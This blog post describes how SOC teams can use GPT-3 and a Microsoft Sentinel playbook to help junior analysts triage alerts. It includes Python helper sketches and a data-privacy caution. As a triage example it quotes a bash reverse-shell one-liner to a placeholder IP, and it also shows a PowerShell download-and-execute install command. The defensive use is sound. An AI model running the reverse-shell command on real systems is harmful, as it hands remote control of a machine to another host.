Empowering Junior Analysts with AI Language Models

May 2023
Curtis Middlehurst

A Security Operations Centre will naturally contain analysts with different experience levels and different exposure to incidents. For a lot of Cyber Security professionals, a SOC Analyst role is their first in the industry. However, the role requires the analyst to discern information from logs, some of which a junior analyst may not have seen before.

Training & Exposure

No matter how much a junior analyst is trained on tools and concepts before hitting the live queue, they will need exposure to many real alerts and logs before being truly effective and able to handle alerts on their own.

Junior analysts can be mentored by more experienced analysts to help provide context to logs and assist in triage until they have gained exposure to alerts and customer environments.

Mentoring in a live SOC

It is important to mentor junior analysts and allow them to shadow the work other analysts do. However, the reality of a live SOC means that the people and time needed for training juniors are not always available.

SOC Analyst work is usually shift based and involves night shifts. This means that when someone gains experience as a security professional, they may look elsewhere for a role with more sociable hours. Over time, this leaves the SOC with a less experienced team overall, with roles being filled by beginners.

Experienced shift analysts that stay in the SOC are your heavy hitters; they are relied upon to take care of the queue. This role is already demanding, so adding the pressure of working their own alerts while supervising the work of juniors can lead to burnout.

Senior analysts will be among the most experienced on the team. However, many senior analyst positions are not shift based and only provide out-of-hours support for critical incidents. Senior analysts may also not be working the alert queue, as they are needed for critical incidents, threat hunting and other project work. This means that senior analysts aren’t available all the time to provide triage assistance and ease the task of training the juniors.

Bridging the Gap with AI Language Models

With recent innovations in the usage of AI language models to assist in everyday tasks, there is an opportunity to empower junior analysts with AI assistance to reduce the reliance on experienced analysts for help.

AI language models can provide answers to the more objective questions a junior analyst may have.

Let’s look at the following commandline: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1. Experienced analysts will be able to identify this as a reverse shell. But what if the person working the alert doesn’t have the experience to know what they are seeing?

We can use a prompt such as ‘Can you tell me what this commandline does, <commandline>’. This will provide an objective answer that the analyst can then use to inform their triage.
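
As a minimal sketch of how that prompt could be assembled from an alert field, the Python below fills the commandline into the question. The names PROMPT_TEMPLATE and build_prompt are illustrative assumptions, not part of any tool mentioned in this post.

```python
# Hypothetical helper: the template wording is taken from the prompt above,
# the names are assumptions made for illustration.
PROMPT_TEMPLATE = "Can you tell me what this commandline does, {commandline}"


def build_prompt(commandline: str) -> str:
    """Wrap a commandline taken from an alert in the question used in this post."""
    # Only trim the ends so the command itself is passed through unchanged.
    return PROMPT_TEMPLATE.format(commandline=commandline.strip())


if __name__ == "__main__":
    print(build_prompt("bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"))
```

Keeping the template in one place means every analyst asks the question the same way, which makes the answers easier to compare between alerts.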

Examples:

The following examples have been created with OpenAI’s GPT-3 (text-davinci-003) language model.

Input: (Reverse Shell One-Liner from PentestMonkey): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Output: “This commandline is used to open a reverse shell connection from the local machine to a remote machine at 10.0.0.1 on port 8080. It allows the remote machine to execute commands on the local machine.”

Input: (Chocolatey install command, which commonly triggers analytics that detect PowerShell downloads): Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))

Output: “This commandline will download and execute the installation script for Chocolatey, a package manager for Windows. It will install Chocolatey on the computer and configure it for use.”

Input: sudo apt autoremove --purge

Output: “This commandline is used to remove packages that were automatically installed to satisfy dependencies for other packages and are no longer needed. The "sudo" command allows the user to run the command with administrative privileges, the "apt" command is used to manage packages, the "autoremove" command removes packages that were automatically installed to satisfy dependencies for other packages and are no longer needed, and the "--purge" flag removes not only the package itself, but also any configuration files associated with it.”

Turning this into a playbook for Microsoft Sentinel

SOAR solutions can be used to make API requests to third-party services with information from alerts.

This can be achieved by sending an HTTP request to the OpenAI API.
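
For illustration, a raw request of this kind could look roughly like the Python sketch below. It assumes OpenAI's legacy completions endpoint and the text-davinci-003 model used for the examples in this post; model availability changes over time, so the model name may need updating. The function names and the max_tokens and temperature values are assumptions chosen for the example. Letting a JSON serialiser build the body avoids hand-escaping quotes and backslashes in the commandline.

```python
import json
import urllib.request

# Assumption: the legacy completions endpoint, matching text-davinci-003.
OPENAI_COMPLETIONS_URL = "https://api.openai.com/v1/completions"


def build_completion_request(prompt: str, api_key: str) -> urllib.request.Request:
    """Build (but do not send) a POST request asking the model to answer the prompt."""
    payload = {
        "model": "text-davinci-003",
        "prompt": prompt,
        "max_tokens": 200,  # assumed limit, enough for a short explanation
        "temperature": 0,   # assumed setting, to keep answers repeatable
    }
    # json.dumps escapes quotes and backslashes in the commandline for us.
    body = json.dumps(payload).encode("utf-8")
    return urllib.request.Request(
        OPENAI_COMPLETIONS_URL,
        data=body,
        headers={
            "Authorization": f"Bearer {api_key}",
            "Content-Type": "application/json",
        },
        method="POST",
    )


def explain_commandline(prompt: str, api_key: str) -> str:
    """Send the request and return the text of the first completion."""
    request = build_completion_request(prompt, api_key)
    with urllib.request.urlopen(request, timeout=30) as response:
        result = json.load(response)
    return result["choices"][0]["text"].strip()
```

Calling explain_commandline needs a valid API key and network access; build_completion_request can be inspected on its own without sending anything.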

Since Microsoft has partnered with OpenAI, there are OpenAI connectors for Logic Apps that put this API request into an easy-to-configure format. I would recommend using this method to avoid requests failing because of incorrectly escaped text and similar issues.

I created a ready-made Microsoft Sentinel playbook that uses the OpenAI connector to send this request. It is available to deploy for free from Microsoft’s ‘Azure-Sentinel’ GitHub repo.

Protecting Customer Data

It’s hard to believe, but some customers don’t want you to send off their data from security events to an AI language model for analysis. I personally wouldn’t recommend putting a playbook that queries public AI tools into an automation rule unless you are sure that nothing sensitive is going to come through. 

This is quite hard to determine in a production environment. However, that’s where the SOC analyst can put in some of that good old human analysis work to determine whether the information is suitable to be sent off before manually running the playbook (which in most cases is just a click or two away from the alert screen).
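
A simple pre-check can support that manual decision, though it cannot replace it. The Python sketch below flags a few obvious markers before anything is sent. The pattern list and the names SENSITIVE_PATTERNS and flag_sensitive are assumptions for illustration and are nowhere near exhaustive, so an empty result does not mean the text is safe to share.

```python
import re

# Illustrative patterns only; a real environment would need its own list.
SENSITIVE_PATTERNS = {
    "ipv4_address": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "email_address": re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b"),
    "possible_secret": re.compile(
        r"(?i)\b(?:password|passwd|token|api[_-]?key)\b\s*[=:]"
    ),
}


def flag_sensitive(text: str) -> list[str]:
    """Return the names of the patterns found in the text, sorted alphabetically."""
    return sorted(
        name for name, pattern in SENSITIVE_PATTERNS.items() if pattern.search(text)
    )


if __name__ == "__main__":
    # The reverse shell example contains an IP address, so it gets flagged.
    print(flag_sensitive("bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"))
```

The analyst still makes the final call; the flags only point out what to look at before clicking the playbook.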

Private instances such as Azure OpenAI will likely provide a way to use customer data in a secure and compliant way. For now Azure OpenAI is only available via application form.

Summary

AI language models are tools, not a replacement for junior analysts. Without juniors we won’t have senior analysts in the future. Any tool, no matter how advanced, needs to be used alongside people who have the instincts and the ability to pick up patterns that AI language models would struggle with.